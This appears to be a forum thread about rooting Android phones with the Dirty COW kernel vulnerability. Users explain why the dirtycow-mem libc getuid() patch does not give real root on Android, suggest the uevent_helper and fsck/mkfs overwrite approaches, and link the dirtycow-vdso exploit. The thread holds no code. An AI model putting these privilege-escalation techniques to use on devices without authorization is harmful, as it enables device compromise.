Not true. This code executes su as root, spawning a root shell. It can be modified to run a script that installs su in/system etc..
The counterside is that the kernel crashes/freezes after some seconds.
<URL>
I'd like to port that to an apk using the ndk, but my pc is too old.
Click to expand...
Click to collapse
Well that assumes we have a setuid su already, this variant of the exploit won't help us.
julianwi said:
The /system partition is mounted read only by default. Because of this, you can't overwrite them. But I saw a exploit which used /sys/kernel/uevent_helper to execute a shell script as root. This would probably also work with the dirty cow exploit.
Click to expand...
Click to collapse
Somehow it did manage to overwrite it, but maybe the reboot and reset are caused by it being read-only and not actually writing the changes to persistent storage.
Will look into /sys/kernel/uevent_helper though, thanks
Scorpius666 said:
...
I copied the su binary in /data/local/tmp. I can modify files in /system/bin for example and the phone does not reboot, but i don't have fsck_msdos in my phone.
...
Click to expand...
Click to collapse
Just about any would work, you probably have some other fsck or mkfs utility you could do it with, then trying to format an SD card should run mkfs
a___ said:
Just about any would work, you probably have some other fsck or mkfs utility you could do it with, then trying to format an SD card should run mkfs
Click to expand...
Click to collapse
The thing is all my fsck* files are not readable, only by root, at least in my device. The exploit needs a readable file.
a___ said:
Well that assumes we have a setuid su already, this variant of the exploit won't help us
Click to expand...
Click to collapse
Nope. The su command is executed as root, and when you execute su as root it gives you a root shell. Try to execute sh instead of su.
DP FH said:
Nope. The su command is executed as root, and when you execute su as root it gives you a root shell. Try to execute sh instead of su.
Click to expand...
Click to collapse
No, it merely makes libc report that the user is root even though it isn't, it needs su to already have setuid to switch to the real root, and then running the shell. In this case (simplified) the exploit just bypasses the password prompt.
a___ said:
No, it merely makes libc report that the user is root even though it isn't, it needs su to already have setuid to switch to the real root, and then running the shell. In this case (simplified) the exploit just bypasses the password prompt.
Click to expand...
Click to collapse
I just noticed that. Using sh instead of su, the dirtycow-mem works in the phone and it spawns a shell, but with the same privileges than the user that executed it. So it's useless at least with that libc approach.
Scorpius666 said:
I just noticed that. Using sh instead of su, the dirtycow-mem works in the phone and it spawns a shell, but with the same privileges than the user that executed it. So it's useless at least with that libc approach.
Click to expand...
Click to collapse
Strange, on normal x86 works like a charm so something needs to be fixed
DP FH said:
Strange, on normal x86 works like a charm so something needs to be fixed
Click to expand...
Click to collapse
Of course it works on x86. If you read the code you'll see that it changes the function getuid() of libc (that is already loaded in memory) to return 0. The x86 su binary uses getuid() to know if it should ask for a password or not. Since getuid() is patched, it doesn't ask a password and spawn a root shell.
So basically for dirtycow-mem to work you need:
A su binary with setuid root
That su binary should ask for a password
The Android su binary doesn't ask for a password and doesn't have the setuid root so this exploit won't work.
hey there
did anyone try the dirtycow-vdso exploit? it works on SELinux (which AOSP uses) and doesn't require a SUID see
github . com/scumjr/dirtycow-vdso

Categories

Resources